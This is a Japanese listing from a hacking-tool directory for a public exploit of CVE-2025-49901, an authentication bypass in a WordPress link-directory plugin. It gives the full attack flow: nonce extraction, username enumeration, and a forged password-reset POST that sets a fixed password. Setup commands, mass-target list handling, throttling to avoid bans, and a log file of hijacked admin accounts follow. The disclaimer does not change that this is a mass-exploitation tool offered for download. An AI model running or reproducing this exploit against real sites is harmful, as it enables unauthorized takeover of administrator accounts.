Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-49901 — WordPress Simple Link Directory Plugin < 14.8.1 は、優先度の高い「認証の欠落」脆弱性の影響を受けます。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-49901
認証と認可偵察パスワード攻撃脆弱性分析エクスプロイトウェブアプリケーション悪用
GitHubnxploited/cve-2025-49901

CVE-2025-49901

WordPress Simple Link Directory Plugin < 14.8.1 は、優先度の高い「認証の欠落」脆弱性の影響を受けます。

リポジトリを見る
4ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-49901

WordPress Simple Link Directory プラグイン 14.8.1 未満には、高優先度の認証バイパスの脆弱性があります。

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║        CVE-2025-49901  ·  Simple Link Directory  ·  qc-opd       ║
║           認証バイパス → パスワードリセット → RCE           ║
╚═══════════════════════════════════════════════════════════════════╝

CVE CVSS Plugin Auth Python Author


▸ 脆弱性

CVECVE-2025-49901
CVSS9.8 CRITICAL — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ADPCISA-ADP
プラグインquantumcloud Simple Link Directory (qc-simple-link-directory)
影響を受けるバージョンAll versions < 14.8.1
認証None required
タイプAuthentication Bypass via Alternate Path (CWE-288)
CWECWE-288 · Authentication Bypass Using an Alternate Path or Channel

SLDページに公開されているqc-opdパスワードリセットフォームは、トークン、メール確認、権限チェックなどを介してユーザーの身元を確認することなく、ユーザー名と新しいパスワードを受け入れます。認証されていない攻撃者は、WordPressのユーザー名を列挙し、任意のアカウントに対してリセットフォームを送信し、注入されたパスワードで即座に認証することができます。これにより、対象ユーザーの操作なしに管理者権限を取得できます。


▸ 攻撃フロー

root@kitploit:~
┌─────────────────────────────────────────────────────────┐
│  1. Locate SLD reset page                               │
│     Probe 28+ paths → match: "sld" + "_wpnonce" + form  │
│                                                         │
│  2. Extract nonce                                       │
│     Parse _wpnonce from HTML / JS / qc-opd-nonce        │
│                                                         │
│  3. Enumerate usernames                                 │
│     /?author=1..10  +  /wp-json/wp/v2/users  + hostname │
│                                                         │
│  4. Reset password for each username                    │
│     POST qc-restore-pwd=restore                         │
│         qc-uid=<username>                               │
│         pass=newhackerpass123                           │
│         _wpnonce=<nonce>                                │
│                                                         │
│  5. Verify access (dual mode)                           │
│     Session mode  → cookie check + /wp-admin/ probes    │
│     Password mode → wp-login.php + admin panel check    │
│                                                         │
│  6. Write confirmed hits → scan_results/reset_mass_success.txt │
└─────────────────────────────────────────────────────────┘

▸ セットアップ

root@kitploit:~
git clone https://github.com/Nxploited/CVE-2025-49901.git
cd CVE-2025-49901
pip install requests colorama urllib3
python3 CVE-2025-49901.py

requirements.txt

root@kitploit:~
requests>=2.28.0
colorama>=0.4.6
urllib3>=1.26.0

▸ 使用方法

root@kitploit:~
ターゲットリストファイル          →  list.txt  (1行に1ホスト)
スレッド数                    →  デフォルト5
HTTPタイムアウト               →  デフォルト10秒
ユーザーごとの遅延 MIN/MAX     →  アンチバンスロットル  (デフォルト0.3秒 / 0.7秒)
サイト間の遅延        →  デフォルト1.0秒
出力ファイル                →  scan_results/reset_mass_success.txt

ターゲット形式:

root@kitploit:~
https://target1.com
target2.com
http://target3.com/wordpress

すべてのリセットに注入される固定パスワード:

root@kitploit:~
newhackerpass123

▸ ユーザー名列挙ソース

方法エンドポイント
著者リダイレクト/?author=1 → /?author=10

▸ 管理者権限確認ロジック

各リセット試行後、ツールは2つの独立した方法でアクセスを確認します:

root@kitploit:~
セッションモード   →  wordpress_logged_inクッキー + /wp-admin/インジケーターを確認
パスワードモード  →  wp-login.phpへの完全なPOST + マルチパス管理者パネルプローブ

確認される管理者インジケーター:

root@kitploit:~
id="adminmenu"  ·  id="wpadminbar"  ·  id="wpwrap"
users.php  ·  plugins.php  ·  plugin-install-tab  ·  upload-plugin

▸ ターミナル出力形式

root@kitploit:~
[HH:MM:SS] [https://target.com] NONCE: OK   | RESET: OK   | ACCESS: 1 HIT
[HH:MM:SS] [https://target2.com] NONCE: FAIL | RESET: -    | ACCESS: 0 HIT

▸ 出力ファイル

scan_results/reset_mass_success.txt

root@kitploit:~
[2025-06-01T14:22:10] https://target.com - account=admin  pass=newhackerpass123  mode=password
[2025-06-01T14:22:18] https://target.com - account=editor pass=newhackerpass123  mode=session

▸ 作成者

root@kitploit:~
Nxploited (Khaled Alenazi)
GitHub   →  https://github.com/Nxploited
Telegram →  @KNxploited

GitHub Telegram


▸ 免責事項

root@kitploit:~
認可されたセキュリティ研究および教育目的のみに使用してください。

著者は、操作者が所有していない、または明示的な書面による許可を得ていないシステムに対する使用について一切の責任を負いません。

許可されていない使用は、CFAA、CMA、および世界中の同等の法律に違反します。あなたの行動に対する責任はあなた自身にあります。

© 2025 Nxploited · Simple Link Directory < 14.8.1 · 14.8.1で修正

ツールをダウンロード
REST API/wp-json/wp/v2/users
ホスト名ドメインの最初のラベルをフォールバックとして
ハードコードadminは常に含まれる